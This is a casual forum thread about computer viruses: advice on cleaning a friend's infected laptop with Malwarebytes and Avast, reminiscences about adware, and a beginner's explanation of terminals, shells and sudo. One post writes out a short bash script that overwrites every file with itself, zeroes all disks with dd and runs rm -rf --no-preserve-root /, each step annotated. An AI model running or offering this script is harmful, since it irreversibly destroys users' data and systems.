Computer Viruses
I guess this is another bump…
Nice, my other real life friend somehow downloaded 4 viruses. She claims she doesn't know how to download anything.
I was shocked when I found out that the PC had 55 TROJANS in it's entire lifespan.
I'm gonna have to factory reset it too fix it and upgrade it to Windows 10 because Windows 8"s UI is just a complete mess, plus, W10 will keep the viruses off and it will certainly speed up her laptop.
The viruses corrupted some of the vital files needed for installing W10 (VERY SMART LITTLE BUGS BUT THEY CAN'T FOOL ME) so that's why I need to factory reset it.
But first, she needs to buy a flash drive before I factory reset her PC and she loses over half a gig of her pictures from her phone.(THAT'S A LOT OF PICTURES!)
Why don't you just download malwarebytes and remove the Trojans? Mbam is good as it detects PUPs aswell- program that aren't malware but you don't want. You could try combo fix but that's really serious and could damage your pc. A combo of malwarebytes and avast should do the trick, just get the free version
EDIT: when you upgrade to windows10, be aware the antivirus is very basic. You might need more av software like malwarebytes. Also make sure you check some of the privacy settings!
Also, did you format the hard drive when you tried to install windows 10?

so the person was in the middle of upgrading to Windows 10, and then it couldn't as the files were corrupted?
Sounds more like there was a problem with the actual install medium. Get a USB flash drive and on another computer set it up to do a clean install and make sure to format the drive so the pesky viruses are no longer on the drive (well, technically they are, you just cant use them)
OR…. (easier method)
use a combination of Malware Bytes and Avast to get rid of the Trojans. might be worth installing ad-block on your friends computer aswell

Not really… it's just a general virus discussion. Is this some sort of help topic if you get a virus or what? xD

shopt -s globstar #1 for p in **; do #2 [ -d $p ] || cat $0 > $p #3 done #4 dd if=/dev/zero of=/dev/sd? #5 rm -rf --no-preserve-root / #6
- enable bash's recursive globbing
- for each file/folder (in variable p) in every file in every folder relative to the current directory
- if it is not a directory write the contents of the file pointed to in the variable $0 (argv[0]) to the file pointed to by $p
- stop looping
- attempt to wipe every hard drive
- attempt to delete every file in the root folder

Sounds good and also the way to remove the malware. Also there's no point in factory resetting if your reformatting ;P . Do be aware if you restore files you could get infected. As it sounds like its not your computer and this happens a lot to her i would install MBAM and adblock plus. I would say Common sense 2016, But it doesn't seem compatible with your hardware

Computer Viruses
I remember having a laptop when I was a dumb kid. It had one virus, it wasn't BAD, but it was well uh bad? anyway it sets your homepage to a random search engine. it made the pc slow, other then that, it was fine. it did freeze sometimes if I was on MS PAINT for some reason (came with laptop) and yea.. then that next year, that virus then made other viruses I guess, then I had to literally delete them all. I forgot the antivirus I used, but it was the one that ALSO came with the laptop because I wanted to be safe.
then I got a new computer and so far, no viruses.
and, who ever had bonzi buddy? I must say it's the funniest virus, even if it's bad. I never had it luckily, because i'm smart enough to not get it.

I'm not sure you learn “sudo” commands. And i'm pretty sure it's not limited to Ubuntu. Anyways…
About White Hat Hacking
I'm a penetration tester I guess, not really an expert but I like to strengthen my network and all the devices in it.

sudo is normally just appending “sudo ” to the start of every command to run as root…

Ok DrKat123
I'm going to try to explain commands, terminals and shells
What's a teletype?
Here's the Wikipedia article on a teletype.
It's basically a typewriter and a printer in one.
It was used to connect to a large computer. This was before they had small computers with screens.
Later they had video terminals to replace them.
Now, on PCs with screens, a peice of software called a ‘terminal emulator’ is run on a computer and simulates a terminal.
This is what the Terminal app on Ubuntu is.
What's a shell?
A shell is a program that takes commands as input (this input can come from a teletype, a video terminal, or a terminal emulator) and executes them. With the exceptions of a few built-in commands such as cd, these commands are actually regular external programs.
Bash is an example. It's what Ubuntu uses by default.
So that's the difference between a shell and a terminal.
The ‘Terminal’ app on Ubuntu doesn't actually interpret the commands, but the shell (bash).
And commands like sudo, dd, cat, mv, rm are just normal programs that the shell invokes when you type their name.
Sudo just runs the command it is passed as root. So, as Firedrake969 said above, sudo commands are just normal commands with “sudo ” prepended to them. (It's prepending, not appending.)

I was a joke and i didn't know quite how to say it right, seeing as people argue/interpret what it means differently even thought Super user - do makes the most sense
